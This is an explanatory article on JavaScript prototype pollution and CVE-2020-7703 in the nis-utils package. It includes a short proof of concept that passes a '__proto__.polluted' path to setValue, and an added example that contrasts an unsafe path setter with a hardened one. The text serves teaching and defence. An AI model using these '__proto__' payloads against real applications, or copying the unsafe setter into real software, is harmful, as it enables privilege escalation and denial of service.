HTTP Prototype Pollution and CVE-2020-7703
Prototype Pollution
Prototype Pollution is a vulnerability affecting JavaScript. It refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including magical attributes such as __proto__, constructor and prototype.
The vulnerability occurs when injected properties are then relied on by the vulnerable web application, leading to unexpected behavior.
Some examples of what Prototype Pollution can lead to:
Denial of service (DoS)
DoS takes place when Object holds common functions that are implicitly called for a variety of operations. The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a DoS.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, any code that at some point relies on someobject.toString() will fail.
Remote Code Execution
Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). Here, if the attacker pollutes Object.prototype.someattr, they are likely to be able to leverage this in order to execute code.
Property Injection
If a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.
CVE-2020-7703
Description:
All versions of package nis-utils are vulnerable to Prototype Pollution via the setValue function.
nis-utils package:
- A collection of powerful tools for manipulating Network Information Service (NIS) map files, which are highly interrelated.
- To provide a stable working environment for users, it is vital that the system administrator has tools which report inconsistencies between NIS maps in a timely manner.
- The nis-utils package contains a number of tools that can be used to generate input to makedbm, in place of the awk scripts traditionally used. These tools are far more exacting, and perform a wide variety of input validations, in addition to the necessary reformatting.
- Each of these tools has a checking mode, which allows its input to be validated against other files, e.g. validating password files against group files to make sure that the default groups really exist.
Note:
- The makedbm command creates an NIS map. It takes the input file and converts it to a ypserv database file.
- Awk is used as a data extraction and reporting tool. It is also a general-purpose scripting language designed for advanced text processing.
Proof of Concept
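// Load the vulnerable package
const nisUtils = require('nis-utils');
// The '__proto__' path segment makes setValue write to Object.prototype
nisUtils.object.setValue({}, '__proto__.polluted', true);
// The global object inherits from Object.prototype, so this prints true
console.log(polluted);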
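The following is an added example, not code from the nis-utils package or from the original page. It shows the general pattern behind a path-based setter such as setValue next to a hardened form. The function names setValueUnsafe, setValueSafe and demo are hypothetical, and the input paths are constructed for illustration.

```javascript
// Added example: hypothetical path setters, not the nis-utils source.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Vulnerable pattern: walks a dotted path with no key filtering.
function setValueUnsafe(target, path, value) {
  const keys = path.split('.');
  let node = target;
  for (const key of keys.slice(0, -1)) {
    if (typeof node[key] !== 'object' || node[key] === null) node[key] = {};
    node = node[key]; // '__proto__' resolves to Object.prototype here
  }
  node[keys[keys.length - 1]] = value;
  return target;
}

// Hardened form: reject dangerous keys and only descend into own properties.
function setValueSafe(target, path, value) {
  const keys = path.split('.');
  if (keys.some((k) => BLOCKED_KEYS.has(k))) {
    throw new TypeError(`refusing to set unsafe path: ${path}`);
  }
  let node = target;
  for (const key of keys.slice(0, -1)) {
    const own = Object.prototype.hasOwnProperty.call(node, key);
    if (!own || typeof node[key] !== 'object' || node[key] === null) node[key] = {};
    node = node[key];
  }
  node[keys[keys.length - 1]] = value;
  return target;
}

// Runs both setters on the same constructed path, then removes the pollution.
function demo() {
  const result = {};
  setValueUnsafe({}, '__proto__.isAdmin', true);
  result.unsafePolluted = ({}).isAdmin === true; // unrelated object is affected
  delete Object.prototype.isAdmin;
  try {
    setValueSafe({}, '__proto__.isAdmin', true);
    result.safeRejected = false;
  } catch (err) {
    result.safeRejected = err instanceof TypeError;
  }
  result.safePolluted = ({}).isAdmin === true;
  result.normalWrite = setValueSafe({}, 'user.name', 'alice').user.name;
  return result;
}

console.log(demo());
```

Where such a setter cannot be changed, creating the target with Object.create(null) or freezing Object.prototype at startup limits the effect of a polluted path.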